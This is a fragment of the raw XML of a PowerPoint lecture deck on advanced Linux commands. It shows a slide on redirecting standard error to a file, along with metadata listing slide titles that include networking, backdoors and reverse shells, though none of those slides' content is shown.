              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>stderr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>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
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717047" y="1973525"/>
            <a:ext cx="1513036" cy="8157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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2230083" y="2257748"/>
            <a:ext cx="2098516" cy="188856"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent6"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2523196" y="1631320"/>
            <a:ext cx="805029" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2&lt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>err</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3178588" y="3451091"/>
            <a:ext cx="5197257" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Save error message to a file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>error.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> as system can’t find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>foo.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4328599" y="1661836"/>
            <a:ext cx="4410691" cy="1209844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5315361" y="2190613"/>
            <a:ext cx="526274" cy="126047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67425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Networking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4852988"/>
            <a:ext cx="549275" cy="290512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ct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518429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Chatting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="845568" y="1082425"/>
            <a:ext cx="6596413" cy="3815661"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2416641626"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Fri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2113</TotalTime>
  <Words>654</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>123</Paragraphs>
  <Slides>28</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Dosis</vt:lpstr>
      <vt:lpstr>Monaco</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Sniglet</vt:lpstr>
      <vt:lpstr>Bahnschrift Light Condensed</vt:lpstr>
      <vt:lpstr>Brush Script MT</vt:lpstr>
      <vt:lpstr>Adobe Devanagari</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Friar template</vt:lpstr>
      <vt:lpstr>Advanced Linux Commands</vt:lpstr>
      <vt:lpstr>Standard input/output/error</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Standard output: stdout</vt:lpstr>
      <vt:lpstr>Another example</vt:lpstr>
      <vt:lpstr>Standard input: stdin</vt:lpstr>
      <vt:lpstr>Standard error: stderr</vt:lpstr>
      <vt:lpstr>Networking</vt:lpstr>
      <vt:lpstr>Chatting</vt:lpstr>
      <vt:lpstr>Data Transfer</vt:lpstr>
      <vt:lpstr>Your work</vt:lpstr>
      <vt:lpstr>Goal</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Create a backdoor at Window 10</vt:lpstr>
      <vt:lpstr>Backdoor background</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Reverse Shell</vt:lpstr>
      <vt:lpstr>Motivation</vt:lpstr>
      <vt:lpstr>How to bypass firewall?</vt:lpstr>
      <vt:lpstr>Reverse shell definition</vt:lpstr>
      <vt:lpstr>Reverse shell demo</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Extra credits: Another approach for reverse shell</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Reference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Frank Xu</cp:lastModifiedBy>
  <cp:revision>260</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-25T17:45:38Z</dcterms:modified>
</cp:coreProperties>
</file>